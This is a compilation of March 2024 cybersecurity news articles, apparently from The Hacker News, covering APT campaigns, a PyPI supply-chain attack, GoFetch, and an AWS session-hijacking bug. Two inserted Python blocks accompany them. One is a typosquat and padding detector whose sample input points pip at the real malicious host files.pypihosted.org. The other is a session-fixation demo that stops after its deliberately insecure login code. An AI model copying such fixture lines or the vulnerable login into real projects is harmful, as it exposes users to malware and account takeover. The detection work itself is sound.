"In 2010, the HSSD established Wuhan XRZ as a front company to carry out cyber operations. This malicious cyber activity resulted in the surveillance of U.S. and foreign politicians, foreign policy experts, academics, journalists, and pro-democracy activists, as well as persons and companies operating in areas of national importance."
"Chinese state-sponsored cyber espionage is not a new threat and the DoJ's unsealed indictment today showcases the full gambit of their cyber operations in order to advance the People's Republic of China (PRC) agenda. While this is not a new threat, the scope of the espionage and the tactics deployed are concerning," Alex Rose, director of government partnerships at Secureworks Counter Threat Unit, said.
"The Chinese have evolved their typical MO in the last couple of years to evade detection and make it harder to attribute specific cyber-attacks to them. This is part of a broader strategic effort that China is able to execute on. The skills, resources and tactics at the disposal of the PRC make them an ongoing high and persistent threat to governments, businesses, and organizations around the world."
The charges come after the U.K. government pointed fingers at APT31 for targeting parliamentarians' emails in 2021 and an unnamed China state-affiliated threat actor for "malicious cyber campaigns" aimed at the Electoral Commission. The breach of the Electoral Commission led to the unauthorized access of voter data belonging to 40 million people.
The incident was disclosed by the regulator in August 2023, although there is evidence that the threat actors accessed the systems two years prior to it.
Coinciding with the revelations from the U.K. and the U.S., New Zealand said it uncovered links between the Chinese state-sponsored apparatus and cyber attacks against parliamentary entities in the country in 2021. The activity has been attributed to another MSS-backed group tracked as APT40 (aka Bronze Mohawk, Gingham Typhoon, ISLANDDREAMS, and Kryptonite Panda).
Australia, in its own statement, expressed "serious concerns" about the malicious cyber activities conducted by China state-sponsored actors targeting the U.K., and called on "all states to act responsibly in cyberspace." However, it claimed that its own electoral systems "were not compromised by the cyber campaigns targeting the U.K."
China, however, has rejected the accusations, describing them as "completely fabricated" and amounting to "malicious slanders." A spokesperson for the Chinese embassy in Washington D.C. told BBC News the countries have "made groundless accusations."
"The origin-tracing of cyberattacks is highly complex and sensitive. When investigating and determining the nature of cyber cases, one needs to have adequate and objective evidence, instead of smearing other countries when facts do not exist, still less politicize cybersecurity issues," Foreign Ministry Spokesperson Lin Jian said.
"We hope relevant parties will stop spreading disinformation, take a responsible attitude and jointly safeguard peace and security in the cyberspace. China opposes illegal and unilateral sanctions and will firmly safeguard its lawful rights and interests."
U.S. Sanctions 3 Cryptocurrency Exchanges for Helping Russia Evade Sanctions
27.3.24
Cryptocurrency
The Hacker News
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) sanctioned three cryptocurrency exchanges for offering services used to evade economic restrictions imposed on Russia following its invasion of Ukraine in early 2022.
This includes Bitpapa IC FZC LLC, Crypto Explorer DMCC (AWEX), and Obshchestvo S Ogranichennoy Otvetstvennostyu Tsentr Obrabotki Elektronnykh Platezhey (TOEP).
In all, the designations cover thirteen entities and two individuals operating in the Russian financial services and technology sectors.
"Many of the individuals and entities designated today facilitated transactions or offered other services that helped OFAC-designated entities evade sanctions," the Treasury said, adding the action seeks to "target companies servicing Russia's core financial infrastructure and curtail Russia's use of the international financial system to further its war against Ukraine."
Bitpapa, which offers virtual currency exchange to Russian nationals, has been accused of facilitating transactions worth millions of dollars with sanctioned Russian entities Hydra Market and Garantex.
Crypto Explorer, the Treasury said, offers currency conversion services between virtual currencies, rubles, and UAE dirhams.
"AWEX offers cash services at its offices in Moscow and Dubai and also loads funds onto credit cards associated with OFAC-designated Russian banks such as Sberbank and Alfa-Bank," it added.
Also sanctioned is another virtual currency exchange run by TOEP that's alleged to have enabled digital payments in rubles and virtual currencies to sanctioned entities such as Sberbank, Alfa-Bank, and Hydra Market.
The penalty list also features Moscow-based fintech companies such as B-Crypto, Masterchain and Laitkhaus, which have partnered with sanctioned Russian banks to issue, exchange, and transfer cryptocurrency assets.
Pursuant to the sanctions, all properties and interests in the U.S. connected to designated individuals and entities will be frozen. Furthermore, entities at least 50% owned directly or indirectly by one or more blocked persons will also be subject to the blockade.
"Russia is increasingly turning to alternative payment mechanisms to circumvent U.S. sanctions and continue to fund its war against Ukraine," said Brian E. Nelson, Under Secretary of the Treasury for Terrorism and Financial Intelligence.
"As the Kremlin seeks to leverage entities in the financial technology space, Treasury will continue to expose and disrupt the companies that seek to help sanctioned Russian financial institutions reconnect to the global financial system."
CISA Alerts on Active Exploitation of Flaws in Fortinet, Ivanti, and Nice Products
26.3.24
BigBrothers
The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The vulnerabilities added are as follows -
CVE-2023-48788 (CVSS score: 9.3) - Fortinet FortiClient EMS SQL Injection Vulnerability
CVE-2021-44529 (CVSS score: 9.8) - Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) Code Injection Vulnerability
CVE-2019-7256 (CVSS score: 10.0) - Nice Linear eMerge E3-Series OS Command Injection Vulnerability
The shortcoming impacting Fortinet FortiClient EMS came to light earlier this month, with the company describing it as a flaw that could allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests.
Fortinet has since revised its advisory to confirm that it has been exploited in the wild, although no other details regarding the nature of the attacks are currently available.
CVE-2021-44529, on the other hand, concerns a code injection vulnerability in Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) that allows an unauthenticated user to execute malicious code with limited permissions.
Recent research published by security researcher Ron Bowes indicates that the flaw may have been introduced as an intentional backdoor in a now-discontinued open-source project called csrf-magic that existed at least since 2014.
CVE-2019-7256, which permits an attacker to conduct remote code execution on Nice Linear eMerge E3-Series access controllers, has been exploited by threat actors as early as February 2020.
The flaw, alongside 11 other bugs, was addressed by Nice (formerly Nortek) earlier this month. That said, these vulnerabilities were originally disclosed by security researcher Gjoko Krstic in May 2019.
In light of the active exploitation of the three flaws, federal agencies are required to apply the vendor-provided mitigations by April 15, 2024.
The development comes as CISA and the Federal Bureau of Investigation (FBI) released a joint alert, urging software manufacturers to take steps to mitigate SQL injection flaws.
The advisory specifically highlighted the exploitation of CVE-2023-34362, a critical SQL injection vulnerability in Progress Software's MOVEit Transfer, by the Cl0p ransomware gang (aka Lace Tempest) to breach thousands of organizations.
"Despite widespread knowledge and documentation of SQLi vulnerabilities over the past two decades, along with the availability of effective mitigations, software manufacturers continue to develop products with this defect, which puts many customers at risk," the agencies said.
Hackers Hijack GitHub Accounts in Supply Chain Attack Affecting Top-gg and Others
26.3.24
Hacking
The Hacker News
Unidentified adversaries orchestrated a sophisticated attack campaign that has impacted several individual developers as well as the GitHub organization account associated with Top.gg, a Discord bot discovery site.
"The threat actors used multiple TTPs in this attack, including account takeover via stolen browser cookies, contributing malicious code with verified commits, setting up a custom Python mirror, and publishing malicious packages to the PyPI registry," Checkmarx said in a technical report shared with The Hacker News.
The software supply chain attack is said to have led to the theft of sensitive information, including passwords, credentials, and other valuable data. Some aspects of the campaign were previously disclosed at the start of the month by an Egypt-based developer named Mohammed Dief.
It chiefly entailed setting up a clever typosquat of the official PyPI domain known as "files.pythonhosted[.]org," giving it the name "files.pypihosted[.]org" and using it to host trojanized versions of well-known packages like colorama. Cloudflare has since taken down the domain.
"The threat actors took Colorama (a highly popular tool with 150+ million monthly downloads), copied it, and inserted malicious code," Checkmarx researchers said. "They then concealed the harmful payload within Colorama using space padding and hosted this modified version on their typosquatted-domain fake-mirror."
These rogue packages were then propagated via GitHub repositories such as github[.]com/maleduque/Valorant-Checker and github[.]com/Fronse/League-of-Legends-Checker that contained a requirements.txt file, which serves as the list of Python packages to be installed by the pip package manager.
One repository that continues to remain active as of writing is github[.]com/whiteblackgang12/Discord-Token-Generator, which includes a reference to the malicious version of colorama hosted on "files.pypihosted[.]org."
Also altered as part of the campaign is the requirements.txt file associated with Top.gg's python-sdk by an account named editor-syntax on February 20, 2024. The issue has been addressed by the repository maintainers.
It's worth noting that the "editor-syntax" account is a legitimate maintainer of the Top.gg GitHub organization and has write permissions to Top.gg's repositories, indicating that the threat actor managed to hijack the verified account in order to make a malicious commit.
"The GitHub account of 'editor-syntax' was likely hijacked through stolen cookies," Checkmarx noted.
"The attacker gained access to the account's session cookies, allowing them to bypass authentication and perform malicious activities using the GitHub UI. This method of account takeover is particularly concerning, as it does not require the attacker to know the account's password."
What's more, the threat actors behind the campaign are said to have pushed multiple changes to the rogue repositories in one single commit, altering as many as 52 files in one instance in an effort to conceal the changes to the requirements.txt file.
The activity is believed to have commenced back in November 2022, when the attackers uploaded a series of four counterfeit packages to the PyPI repository. Subsequently, 10 other packages made their way to PyPI, the most recent being "yocolor" that was published on March 5, 2024.
"Yocolor" is also engineered to propagate the malware-laced "colorama" package, underscoring the threat actor's exploitation of the trust in the open-source package ecosystem to install the rogue library by listing it as a dependency in the project's requirements.txt file.
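A defender-side check for the two concealment tricks described above, the typosquatted download host referenced from requirements.txt and the whitespace-padded payload line in the trojanized package. This is an added example, not Checkmarx's or Top.gg's code; the trusted-host list, the 0.8 similarity cutoff and the sample inputs are assumptions.

```python
"""Two checks for the tricks described above: a requirements.txt that pulls
packages from a host other than PyPI's own, and a source line that hides code
behind a long run of whitespace. Added example, not Checkmarx's or the
project's code; the trusted-host list, the 0.8 similarity cutoff and the
sample inputs below are assumptions."""
import re
from difflib import SequenceMatcher
from typing import Optional
from urllib.parse import urlparse

# Hosts that legitimately serve packages for the default PyPI index (assumption).
TRUSTED_HOSTS = ("pypi.org", "files.pythonhosted.org")

_URL_RE = re.compile(r"https?://[^\s'\"]+")
# A comment starts at line start or after whitespace; '#sha256=' inside a URL is kept.
_COMMENT_RE = re.compile(r"(^|\s)#.*$")


def lookalike_of(host: str, cutoff: float = 0.8) -> Optional[str]:
    """Return the trusted host that `host` most resembles when it is a close
    but inexact match (a likely typosquat), otherwise None."""
    best, best_ratio = None, 0.0
    for trusted in TRUSTED_HOSTS:
        ratio = SequenceMatcher(None, host, trusted).ratio()
        if host != trusted and ratio >= cutoff and ratio > best_ratio:
            best, best_ratio = trusted, ratio
    return best


def find_untrusted_hosts(requirements_text: str) -> list:
    """Scan requirements.txt text and return (line_no, host, lookalike) for every
    URL whose host is not trusted. Catches -i/--index-url/--extra-index-url/
    --find-links options, 'pkg @ https://...' requirements and bare URL lines."""
    findings = []
    for no, raw in enumerate(requirements_text.splitlines(), start=1):
        line = _COMMENT_RE.sub("", raw).strip()
        if not line:
            continue
        for match in _URL_RE.finditer(line):
            host = (urlparse(match.group(0)).hostname or "").lower()
            if host and host not in TRUSTED_HOSTS:
                findings.append((no, host, lookalike_of(host)))
    return findings


def find_padded_lines(source_text: str, min_pad: int = 40) -> list:
    """Return line numbers where code follows at least `min_pad` spaces or tabs
    after other code, i.e. a statement pushed past an editor's visible width."""
    padded = re.compile(r"\S[ \t]{%d,}\S" % min_pad)
    return [no for no, line in enumerate(source_text.splitlines(), start=1)
            if padded.search(line)]


# Constructed sample inputs: the URL paths are invented; the host is the one
# named in the report (defanged there as files.pypihosted[.]org).
SAMPLE_REQUIREMENTS = """\
# constructed requirements.txt
requests==2.31.0
--extra-index-url https://files.pypihosted.org/simple
colorama @ https://files.pypihosted.org/packages/colorama-0.4.6.tar.gz#sha256=placeholder
numpy==1.26.4
"""

# Constructed source: a statement hidden 200 columns to the right of real code.
SAMPLE_SOURCE = (
    "import os\n"
    "x = 1" + " " * 200 + ";exec('print(1)')\n"
    "y = 2\n"
)

if __name__ == "__main__":
    for no, host, alike in find_untrusted_hosts(SAMPLE_REQUIREMENTS):
        note = f" (lookalike of {alike})" if alike else ""
        print(f"requirements line {no}: untrusted host {host}{note}")
    for no in find_padded_lines(SAMPLE_SOURCE):
        print(f"source line {no}: code hidden behind whitespace padding")
```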
The malware embedded in the counterfeit colorama package activates a multi-stage infection sequence that leads to the execution of Python code from a remote server, which, in turn, is capable of establishing persistence on the host via Windows Registry changes and stealing data from web browsers, crypto wallets, Discord tokens, and session tokens related to Instagram and Telegram.
"The malware includes a file stealer component that searches for files with specific keywords in their names or extensions," the researchers said. "It targets directories such as Desktop, Downloads, Documents, and Recent Files."
The captured data is ultimately transferred to the attackers via anonymous file-sharing services like GoFile and Anonfiles. Alternately, the data is also sent to the threat actor's infrastructure using HTTP requests, alongside the hardware identifier or IP address to track the victim machine.
"This campaign is a prime example of the sophisticated tactics employed by malicious actors to distribute malware through trusted platforms like PyPI and GitHub," the researchers concluded.
"This incident highlights the importance of vigilance when installing packages and repositories even from trusted sources. It is crucial to thoroughly vet dependencies, monitor for suspicious network activity, and maintain robust security practices to mitigate the risk of falling victim to such attacks."
Update: The repository "github[.]com/whiteblackgang12/Discord-Token-Generator" is no longer accessible on GitHub.
New "GoFetch" Vulnerability in Apple M-Series Chips Leaks Secret Encryption Keys
26.3.24
Vulnerability
The Hacker News
A new security shortcoming discovered in Apple M-series chips could be exploited to extract secret keys used during cryptographic operations.
Dubbed GoFetch, the vulnerability relates to a microarchitectural side-channel attack that takes advantage of a feature known as data memory-dependent prefetcher (DMP) to target constant-time cryptographic implementations and capture sensitive data from the CPU cache. Apple was made aware of the findings in December 2023.
Prefetchers are a hardware optimization technique that predicts what memory addresses a currently running program will access in the near future and retrieves the data from main memory into the cache accordingly. The goal of this approach is to reduce the program's memory access latency.
DMP is a type of prefetcher that takes into account the contents of memory based on previously observed access patterns when determining what to prefetch. This behavior makes it ripe for cache-based attacks that trick the prefetcher into revealing the contents associated with a victim process that should be otherwise inaccessible.
GoFetch also builds on the foundations of another microarchitectural attack called Augury that employs DMP to leak data speculatively.
"DMP activates (and attempts to dereference) data loaded from memory that 'looks like' a pointer," a team of seven academics from the University of Illinois Urbana-Champaign, University of Texas, Georgia Institute of Technology, University of California, Berkeley, University of Washington, and Carnegie Mellon University said.
"This explicitly violates a requirement of the constant-time programming paradigm, which forbids mixing data and memory access patterns."
Like other attacks of this kind, the setup requires that the victim and attacker have two different processes co-located on the same machine and on the same CPU cluster. Specifically, the threat actor could lure a target into downloading a malicious app that exploits GoFetch.
What's more, while the attacker and the victim do not share memory, the attacker can monitor any microarchitectural side channels available to it, e.g., cache latency.
GoFetch, in a nutshell, demonstrates that "even if a victim correctly separates data from addresses by following the constant-time paradigm, the DMP will generate secret-dependent memory access on the victim's behalf," rendering it susceptible to key-extraction attacks.
In other words, an attacker could weaponize the prefetcher to influence the data being prefetched, thus opening the door to accessing sensitive data. The vulnerability has serious implications in that it completely nullifies the security protections offered by constant-time programming against timing side-channel attacks.
"GoFetch shows that the DMP is significantly more aggressive than previously thought and thus poses a much greater security risk," the researchers noted.
The fundamental nature of the flaw means that it cannot be fixed in existing Apple CPUs, requiring that developers of cryptographic libraries take steps to prevent conditions that allow GoFetch to succeed, something that could also introduce a performance hit. Users, on the other hand, are urged to keep their systems up-to-date.
On Apple M3 chips, however, enabling data-independent timing (DIT) has been found to disable DMP. This is not possible on M1 and M2 processors.
"Apple silicon provides data-independent timing (DIT), in which the processor completes certain instructions in a constant amount of time," Apple notes in its documentation. "With DIT enabled, the processor uses the longer, worst-case amount of time to complete the instruction, regardless of the input data."
The iPhone maker also emphasized that although turning on DIT prevents timing-based leakage, developers are still advised to "avoid conditional branches and memory access locations based on the value of the secret data" in order to block an adversary from inferring secrets by keeping tabs on the processor's microarchitectural state.
The development comes as another group of researchers from the Graz University of Technology in Austria and the University of Rennes in France demonstrated a new graphics processing unit (GPU) attack affecting popular browsers and graphics cards that leverages specially crafted JavaScript code in a website to infer sensitive information such as passwords.
The technique, which requires no user interaction, has been described as the first GPU cache side-channel attack from within the browser.
"Since GPU computing can also offer advantages for computations within websites, browser vendors decided to expose the GPU to JavaScript through APIs like WebGL and the upcoming WebGPU standard," the researchers said.
"Despite the inherent restrictions of the JavaScript and WebGPU environment, we construct new attack primitives enabling cache side-channel attacks with an effectiveness comparable to traditional CPU-based attacks."
A threat actor could weaponize it by means of a drive-by attack, allowing for the extraction of AES keys or mining cryptocurrencies as users browse the internet. It impacts all operating systems and browsers implementing the WebGPU standard, as well as a broad range of GPU devices.
As countermeasures, the researchers propose treating access to the host system's graphics card via the browser as a sensitive resource, requiring websites to seek users' permission (as in the case of the camera or microphone) before use.
Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks
26.3.24
APT
The Hacker News
The Iran-affiliated threat actor tracked as MuddyWater (aka Mango Sandstorm or TA450) has been linked to a new phishing campaign in March 2024 that aims to deliver a legitimate Remote Monitoring and Management (RMM) solution called Atera.
The activity, which took place from March 7 through the week of March 11, targeted Israeli entities spanning global manufacturing, technology, and information security sectors, Proofpoint said.
"TA450 sent emails with PDF attachments that contained malicious links," the enterprise security firm said. "While this method is not foreign to TA450, the threat actor has more recently relied on including malicious links directly in email message bodies instead of adding in this extra step."
MuddyWater has been attributed to attacks directed against Israeli organizations since late October 2023, with prior findings from Deep Instinct uncovering the threat actor's use of another remote administration tool from N-able.
This is not the first time the adversary – assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS) – has come under the spotlight for its reliance on legitimate remote desktop software to meet its strategic goals. Similar phishing campaigns have led to the deployment of ScreenConnect, RemoteUtilities, Syncro, and SimpleHelp in the past.
The latest attack chains involve MuddyWater embedding links to files hosted on file-sharing sites such as Egnyte, Onehub, Sync, and TeraBox. Some of the pay-themed phishing messages are said to have been sent from a likely compromised email account associated with the "co.il" (Israel) domain.
In the next stage, clicking on the link present within the PDF lure document leads to the retrieval of a ZIP archive containing an MSI installer file that ultimately installs the Atera Agent on the compromised system. MuddyWater's use of Atera Agent dates back to July 2022.
The shift in MuddyWater's tactics comes as an Iranian hacktivist group dubbed Lord Nemesis has targeted the Israeli academic sector by breaching a software services provider named Rashim Software in what amounts to a software supply chain attack.
"Lord Nemesis allegedly used the credentials obtained from the Rashim breach to infiltrate several of the company's clients, including numerous academic institutes," Op Innovate said. "The group claims to have obtained sensitive information during the breach, which they may use for further attacks or to exert pressure on the affected organizations."
Lord Nemesis is believed to have used the unauthorized access it gained to Rashim's infrastructure by hijacking the admin account and leveraging the company's inadequate multi-factor authentication (MFA) protections to harvest personal data of interest.
It also sent email messages to over 200 of its customers on March 4, 2024, four months after the initial breach took place, detailing the extent of the incident. The exact method by which the threat actor gained access to Rashim's systems was not disclosed.
"The incident highlights the significant risks posed by third-party vendors and partners (supply chain attack)," security researcher Roy Golombick said. "This attack highlights the growing threat of nation-state actors targeting smaller, resource-limited companies as a means to further their geo-political agendas."
"By successfully compromising Rashim's admin account, the Lord Nemesis group effectively circumvented the security measures put in place by numerous organizations, granting themselves elevated privileges and unrestricted access to sensitive systems and data."
N. Korea-linked Kimsuky Shifts to Compiled HTML Help Files in Ongoing Cyberattacks
24.3.24
APT
The Hacker News
The North Korea-linked threat actor known as Kimsuky (aka Black Banshee, Emerald Sleet, or Springtail) has been observed shifting its tactics, leveraging Compiled HTML Help (CHM) files as vectors to deliver malware for harvesting sensitive data.
Kimsuky, active since at least 2012, is known to target entities located in South Korea as well as North America, Asia, and Europe.
According to Rapid7, attack chains have leveraged weaponized Microsoft Office documents, ISO files, and Windows shortcut (LNK) files, with the group also employing CHM files to deploy malware on compromised hosts.
The cybersecurity firm has attributed the activity to Kimsuky with moderate confidence, citing similar tradecraft observed in the past.
"While originally designed for help documentation, CHM files have also been exploited for malicious purposes, such as distributing malware, because they can execute JavaScript when opened," the company said.
The CHM file is propagated within an ISO, VHD, ZIP, or RAR file; opening it executes a Visual Basic Script (VBScript) that sets up persistence and reaches out to a remote server to fetch a next-stage payload responsible for gathering and exfiltrating sensitive data.
Rapid7 described the attacks as ongoing and evolving, targeting organizations based in South Korea. It also identified an alternate infection sequence that employs a CHM file as a starting point to drop batch files tasked with harvesting the information and a PowerShell script to connect to the C2 server and transfer the data.
"The modus operandi and reusing of code and tools are showing that the threat actor is actively using and refining/reshaping its techniques and tactics to gather intelligence from victims," it said.
The development comes as Broadcom-owned Symantec revealed that the Kimsuky actors are distributing malware impersonating an application from a legitimate Korean public entity.
"Once compromised, the dropper installs an Endoor backdoor malware," Symantec said. "This threat enables attackers to collect sensitive information from the victim or install additional malware."
It's worth noting that the Golang-based Endoor, alongside Troll Stealer (aka TrollAgent), has been recently deployed in connection with cyber attacks that target users downloading security programs from a Korean construction-related association's website.
The findings also arrive amid a probe initiated by the United Nations into 58 suspected cyber attacks carried out by North Korean nation-state actors between 2017 and 2023 that netted $3 billion in illegal revenues to help it further develop its nuclear weapons program.
"The high volume of cyber attacks by hacking groups subordinate to the Reconnaissance General Bureau reportedly continued," the report said. "Trends include targeting defense companies and supply chains and, increasingly, sharing infrastructure and tools."
The Reconnaissance General Bureau (RGB) is North Korea's primary foreign intelligence service, comprising the threat clusters widely tracked as the Lazarus Group – and its subordinate elements, Andariel and BlueNoroff – and Kimsuky.
"Kimsuky has shown interest in using generative artificial intelligence, including large language models, potentially for coding or writing phishing emails," the report further added. "Kimsuky has been observed using ChatGPT."
German Police Seize 'Nemesis Market' in Major International Darknet Raid
24.3.24
BigBrothers
The Hacker News
German authorities have announced the takedown of an illicit underground marketplace called Nemesis Market that peddled narcotics, stolen data, and various cybercrime services.
The Federal Criminal Police Office (aka Bundeskriminalamt or BKA) said it seized the digital infrastructure associated with the darknet service located in Germany and Lithuania and confiscated €94,000 ($102,107) in cryptocurrency assets.
The operation, conducted in collaboration with law enforcement agencies from Germany, Lithuania, and the U.S., took place on March 20, 2024, following an extensive investigation that commenced in October 2022.
Founded in 2021, Nemesis Market is estimated to have had more than 150,000 user accounts and 1,100 seller accounts from all over the world prior to its shutdown. Almost 20% of the seller accounts were from Germany.
"The range of goods available on the marketplace included narcotics, fraudulently obtained data and goods, as well as a selection of cybercrime services such as ransomware, phishing, or DDoS attacks," the BKA said.
The agency said further investigations against criminal sellers and users of the platform are presently ongoing. That said, no arrests have been made.
The development comes a month after another coordinated law enforcement operation took down the LockBit ransomware group, taking control of the outfit's servers and arresting three affiliates from Poland and Ukraine. The disruption prompted the gang to relaunch its cyber extortion operation.
In recent months, German authorities have also taken down Kingdom Market and Crimemarket, both of which boasted of thousands of users and offered a wide array of money laundering and cybercrime services.
Russian Hackers Use 'WINELOADER' Malware to Target German Political Parties
23.3.24
Virus
The Hacker News
The WINELOADER backdoor used in recent cyber attacks targeting diplomatic entities with wine-tasting phishing lures has been attributed as the handiwork of a hacking group with links to Russia's Foreign Intelligence Service (SVR), which was responsible for breaching SolarWinds and Microsoft.
The findings come from Mandiant, which said Midnight Blizzard (aka APT29, BlueBravo, or Cozy Bear) used the malware to target German political parties with phishing emails bearing a logo from the Christian Democratic Union (CDU) around February 26, 2024.
"This is the first time we have seen this APT29 cluster target political parties, indicating a possible area of emerging operational focus beyond the typical targeting of diplomatic missions," researchers Luke Jenkins and Dan Black said.
WINELOADER was first disclosed by Zscaler ThreatLabz last month as part of a cyber espionage campaign that's believed to have been ongoing since at least July 2023. It attributed the activity to a cluster dubbed SPIKEDWINE.
Attack chains leverage phishing emails with German-language lure content that purports to be an invite for a dinner reception to trick recipients into clicking on a phony link and downloading a rogue HTML Application (HTA) file, a first-stage dropper called ROOTSAW (aka EnvyScout) that acts as a conduit to deliver WINELOADER from a remote server.
"The German-language lure document contains a phishing link directing victims to a malicious ZIP file containing a ROOTSAW dropper hosted on an actor-controlled compromised website," the researchers said. "ROOTSAW delivered a second-stage CDU-themed lure document and a next stage WINELOADER payload."
WINELOADER, invoked via a technique called DLL side-loading using the legitimate sqldumper.exe, comes equipped with abilities to contact an actor-controlled server and fetch additional modules for execution on the compromised hosts.
It's said to share similarities with known APT29 malware families like BURNTBATTER, MUSKYBEAT, and BEATDROP, suggesting the work of a common developer.
WINELOADER, per the Google Cloud subsidiary, has also been employed in an operation targeting diplomatic entities in the Czech Republic, Germany, India, Italy, Latvia, and Peru in late January 2024.
"ROOTSAW continues to be the central component of APT29's initial access efforts to collect foreign political intelligence," the company said.
"The first-stage malware's expanded use to target German political parties is a noted departure from the typical diplomatic focus of this APT29 subcluster, and almost certainly reflects the SVR's interest in gleaning information from political parties and other aspects of civil society that could advance Moscow's geopolitical interests."
The development comes as German prosecutors have charged a military officer, named Thomas H, with espionage offenses after he was allegedly caught spying on behalf of Russian intelligence services and passing on unspecified sensitive information. He was arrested in August 2023.
"From May 2023, he approached the Russian Consulate General in Bonn and the Russian Embassy in Berlin several times on his own initiative and offered to cooperate," the Office of the Federal Prosecutor said. "On one occasion, he transmitted information that he had obtained in the course of his professional activities for forwarding to a Russian intelligence service."
New StrelaStealer Phishing Attacks Hit Over 100 Organizations in E.U. and U.S.
22.3.24
Virus
The Hacker News
Cybersecurity researchers have detected a new wave of phishing attacks that aim to deliver an ever-evolving information stealer referred to as StrelaStealer.
The campaigns impact more than 100 organizations in the E.U. and the U.S., Palo Alto Networks Unit 42 researchers said in a new report published today.
"These campaigns come in the form of spam emails with attachments that eventually launch the StrelaStealer's DLL payload," the company said in a report published today.
"In an attempt to evade detection, attackers change the initial email attachment file format from one campaign to the next, to prevent detection from the previously generated signature or patterns."
First disclosed in November 2022, StrelaStealer is equipped to siphon email login data from well-known email clients and exfiltrate them to an attacker-controlled server.
Since then, two large-scale campaigns involving the malware have been detected in November 2023 and January 2024 targeting high tech, finance, professional and legal, manufacturing, government, energy, insurance, and construction sectors in the E.U. and the U.S.
These attacks also aim to deliver a new variant of the stealer that packs in better obfuscation and anti-analysis techniques, while being propagated via invoice-themed emails bearing ZIP attachments, marking a shift from ISO files.
Present within the ZIP archives is a JavaScript file that drops a batch file, which, in turn, launches the stealer DLL payload using rundll32.exe, a legitimate Windows component responsible for running 32-bit dynamic-link libraries.
The stealer malware also relies on a bag of obfuscation tricks to render analysis difficult in sandboxed environments.
"With each new wave of email campaigns, threat actors update both the email attachment, which initiates the infection chain, and the DLL payload itself," the researchers said.
The disclosure comes as Broadcom-owned Symantec revealed that fake installers for well-known applications or cracked software hosted on GitHub, Mega, or Dropbox are serving as a conduit for a stealer malware known as Stealc.
Phishing campaigns have also been observed delivering Revenge RAT and Remcos RAT (aka Rescoms), with the latter delivered by means of a cryptors-as-a-service (CaaS) called AceCryptor, per ESET.
"During the second half of [2023], Rescoms became the most prevalent malware family packed by AceCryptor," the cybersecurity firm said, citing telemetry data. "Over half of these attempts happened in Poland, followed by Serbia, Spain, Bulgaria, and Slovakia."
Other prominent off-the-shelf malware packed inside AceCryptor in H2 2023 include SmokeLoader, STOP ransomware, RanumBot, Vidar, RedLine, Tofsee, Fareit, Pitou, and Stealc. It's worth noting that many of these malware strains have also been disseminated via PrivateLoader.
Another social engineering scam observed by Secureworks Counter Threat Unit (CTU) has been found to target individuals seeking information about recently deceased individuals on search engines with fake obituary notices hosted on bogus websites, driving traffic to the sites through search engine optimization (SEO) poisoning in order to ultimately push adware and other unwanted programs.
"Visitors to these sites are redirected to e-dating or adult entertainment websites or are immediately presented with CAPTCHA prompts that install web push notifications or popup ads when clicked," the company said.
"The notifications display false virus alert warnings from well-known antivirus applications like McAfee and Windows Defender, and they persist in the browser even if the victim clicks one of the buttons."
"The buttons link to legitimate landing pages for subscription-based antivirus software programs, and an affiliate ID embedded in the hyperlink rewards threat actors for new subscriptions or renewals."
While the activity is currently limited to filling fraudsters' coffers via affiliate programs, the attack chains could be easily repurposed to deliver information stealers and other malicious programs.
The development also follows the discovery of a new activity cluster tracked as Fluffy Wolf that's capitalizing on phishing emails containing an executable attachment to deliver a cocktail of threats, such as MetaStealer, Warzone RAT, XMRig miner, and a legitimate remote desktop tool called Remote Utilities.
The campaign is a sign that even unskilled threat actors can leverage malware-as-a-service (MaaS) schemes to conduct successful attacks at scale and plunder sensitive information, which can then be monetized further for profit.
"Although mediocre in terms of technical skills, these threat actors achieve their goals by using just two sets of tools: legitimate remote access services and inexpensive malware," BI.ZONE said.
AWS Patches Critical 'FlowFixation' Bug in Airflow Service to Prevent Session Hijacking
22.3.24
Vulnerability
The Hacker News
Cybersecurity researchers have shared details of a now-patched security vulnerability in Amazon Web Services (AWS) Managed Workflows for Apache Airflow (MWAA) that could be potentially exploited by a malicious actor to hijack victims' sessions and achieve remote code execution on underlying instances.
The vulnerability, now addressed by AWS, has been codenamed FlowFixation by Tenable.
"Upon taking over the victim's account, the attacker could have performed tasks such as reading connection strings, adding configurations and triggering directed acyclic graphs (DAGS)," senior security researcher Liv Matan said in a technical analysis.
"Under certain circumstances such actions can result in RCE on the instance that underlies the MWAA, and in lateral movement to other services."
The root cause of the vulnerability, per the cybersecurity firm, is a combination of session fixation on the web management panel of AWS MWAA and an AWS domain misconfiguration that results in a cross-site scripting (XSS) attack.
Session fixation is a web attack technique that occurs when a user is authenticated to a service without invalidating any existing session identifiers. This permits the adversary to force (aka fixate) a known session identifier on a user so that, once the user authenticates, the attacker has access to the authenticated session.
By abusing the shortcoming, a threat actor could have forced victims to use and authenticate the attacker's known session and ultimately take over the victim's web management panel.
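The session-fixation mechanism described above, reduced to a minimal in-memory session store: an added example, not Tenable's analysis or any AWS code. The vulnerable login keeps whatever session id the client presented and simply marks it authenticated; the hardened login discards that id and binds the login to a freshly issued one, which is why an attacker-known id never becomes an authenticated session. The store, the user name and the two login methods are assumptions standing in for a web panel's session handling.

```python
"""Session fixation and its fix: rotate the session identifier on authentication.

Added example (not Tenable's or AWS's code). The SessionStore is a stand-in for
a web panel's session handling; the self-test at the bottom replays the page's
scenario against both login variants.
"""
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Session:
    user: Optional[str] = None  # None until the session is authenticated


class SessionStore:
    def __init__(self) -> None:
        self._sessions: Dict[str, Session] = {}

    def new_session(self) -> str:
        """Issue an anonymous session id, as a site does for a not-yet-logged-in visitor."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session()
        return sid

    def user_for(self, sid: str) -> Optional[str]:
        s = self._sessions.get(sid)
        return s.user if s else None

    def login_vulnerable(self, presented_sid: str, user: str) -> str:
        """Authenticate the id the client presented without rotating it.

        Whoever already knows `presented_sid` now holds an authenticated session:
        this is the missing invalidation the page describes.
        """
        if presented_sid not in self._sessions:
            presented_sid = self.new_session()
        self._sessions[presented_sid].user = user
        return presented_sid

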